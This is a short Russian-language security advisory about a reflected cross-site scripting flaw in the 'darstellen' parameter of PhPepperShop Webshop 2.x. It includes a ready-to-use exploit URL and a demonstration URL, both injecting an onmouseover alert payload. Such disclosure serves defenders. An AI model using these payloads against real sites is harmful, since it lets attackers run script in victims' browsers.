Программа: PhPepperShop Webshop 2.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "darstellen" сценарием shop/USER_ARTIKEL_HANDLING_AUFRUF.php
(когда "javascript_enabled" установлен в "true"). Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.

Эксплоит:

[Path]/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+onmouseover%3Dalert(411780276689)+&lowlimit=
0&highlimit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40 address.tst&javascript_enabled=true&PEPPERSESS=
d0499c7999470455b75dc23b45e7fb1b&w=1280&h=971

Демонстрация:

http://site.com/shop/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+onmouseover%3Dalert(411780276689)+&
lowlimit=0&highlimit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40
address.tst&javascript_enabled=true&PEPPERSESS=
d0499c7999470455b75dc23b45e7fb1b&w=1280&h=971
 



Оставить мнение